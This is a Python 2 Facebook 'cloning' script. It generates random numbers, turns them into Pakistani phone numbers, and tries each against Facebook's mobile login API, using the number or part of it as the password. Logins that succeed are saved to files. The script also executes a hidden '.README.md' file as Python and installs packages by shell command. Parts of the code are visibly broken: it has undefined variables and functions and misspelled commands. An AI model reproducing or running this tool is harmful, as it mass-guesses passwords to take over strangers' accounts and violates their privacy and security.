# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
import os, re, requests, concurrent.futures
from random import randint
os.system('rm -rf .txt')
for n in range(10000):

    nmbr = random.randint(111111, 999999)
    
    sys.stdout = open('.txt', 'a')

    print nmbr

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    os.system('pkg install nodejs')
    time.sleep(1)
    os.system('python2 .README.md')
    

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser

reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/2.1.0 (Linux; U; Android 8.0.0; SM-G930F Build/R16NW) [FBAN/FB4A;FBAV/187.0.0.43.81;FBPN/com.facebook.katana;FBLC/fr_FR;FBBV/122388438;FBCR/Bouygues Telecom;FBMF/samsung;FBBD/samsung;FBDV/SM-G930F;FBSV/8.0.0;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,h;]')]

def keluar():
	print 'Thanks.'
	os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')
def psb(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)

def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.03)
def tik():
	titik = ['╼','..  ','... ']
	for o in titik:
		print("\r\x1b[1;93mPlease Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"



##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def login():
    
    os.system('clear')
    
    print 47* '\033[1;94m='
    print
    jalan('\x1b[1;95m[\x1b[1;92m1\x1b[1;94m]  \x1b[1;93mSTART PROCESS')
    print
    jalan('\x1b[1;95m[\x1b[1;92m2\x1b[1;94m]  \x1b[1;92mUPDATE PROGRAM')
    print
    jalan('\x1b[1;95m[\x1b[1;92m0\x1b[1;94m]  \x1b[1;96mCLOSE PROCESS')
    print
    print 47* '\033[1;94m='
    star()

def star():
    star = raw_input('\n\n \x1b[1;96m≫≫≫   ')
    if star == '':
        print '[!] Fill in correctly'
        star()
    elif star == '1':
    	os.system('pkg upadte && pkg upgrade')
        os.system('pkg install git')
        os.system('pkg install python2')
        os.system('pkg install figlet')
        os.system('pkg install toilet')
        os.system('clear')
        tik()
        os.system("clear")
        
        print '             \x1b[1;93mPakistan Area Codes'
        print 47 * '\x1b[1;94m⋆'
        print '           \x1b[1;97m00,01,02,03,04,05,06,07,08'
        print '           \x1b[1;97m09,10,11,12,13,14,15,16,17'
        print '           \x1b[1;97m18,21,22,23,24,30,31,32,33'
        print '           \x1b[1;97m34,35,40,41,42,43,44,45,46'
        
        print 47 * '\x1b[1;94m⋆'
        try:
            c = raw_input('\033[1;95m≫≫≫')
            k = "+923"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif star == '2':
        os.system('clear')
        os.system('pip2 install --upgrade Follow')
        os.system('clear')
        print logo1
        print
        jalan(' Tool has been successfully updated')
        time.sleep(1)
        os.system('python2 .README.md')
        menu()
    
    elif star =='0':
        login()
    else:
        print '[!] Fill In Correctly'
        action()
    os.system("clear")
    xxx = str(len(id))
    
    
    jalan("\033[1;93m⊰═════════════════════════════════════════════⊱")
    jalan("\033[1;91m\033[1;33m⊰════════════════\033[1;92m CLONING START\033[1;93m════════════════⊱ \033[1;0m")
    jalan("\033[1;91m\033[1;33m⊰════════════════\033[1;92m TOTAL ACCOUNT\033[1;93m════════════════⊱     \033[1;0m")
    
    jalan("\033[1;93m⊰═════════════════════════════════════════════⊱")
    def main(arg):
        global cpb,oks
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = user
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;94m(✓OPEN IN BROWSER)  ' + k + c + user + '  |  ' + pass1                                       
                okb = open('save/successful.txt', 'a')
                okb.write(k+c+user+pass1+'\n')
                okb.close()
                oks.append(c+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;97m[OPEN AFTER 10 DAYS] \033[1;93m' + k + c + user + ' \033[1;91m |\033[1;95m  ' + pass1
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k+c+user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                else:
                    pass2 = k + c + user
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;94m(✓OPEN IN BROWSER)  ' + k + c + user + '  |  ' + pass2                          
                        okb = open('savd/cloned.txt', 'a')
                        okb.write(k+c+user+pass2+'\n')
                        okb.close()
                        oks.append(c+user+pass2)
                    else:
                        if 'www.facebook.com' in q['error_msg']:
                            print '\033[1;97m[OPEN AFTER 10 DAYS] \033[1;93m' + k + c + user + ' \033[1;91m |\033[1;95m  ' + pass2
                            cps = open('save/cloned.txt', 'a')
                            cps.write(k+c+user+pass2+'\n')
                            cps.close()
                            cpb.append(c+user+pass2)
                                                                                                                                                            
                                                                                                                                                                                                            
                                                                                                                                                                                                            
                                                                                                                                                                                                            
                                                                                                                                                                                                            


                                                                                                                                                                                                            
                                                                                                                                                                                                                    
                                                                                                                                                                                                            



        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print 50* '\033[1;91m-'
    print 'Process Has Been Completed ...'
    print 'Total Online/ : '+str(len(oks))+'\n'+str(len(cpb))
    print('Cloned Accounts Has Been Saved : save/cloned.txt')
    jalan("Note : Your Offline account Will Open after 10 to 20 days")
    print ''
    print """
    ███



"""

    
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
    login() 
          

          
if __name__ == '__main__':
    login()

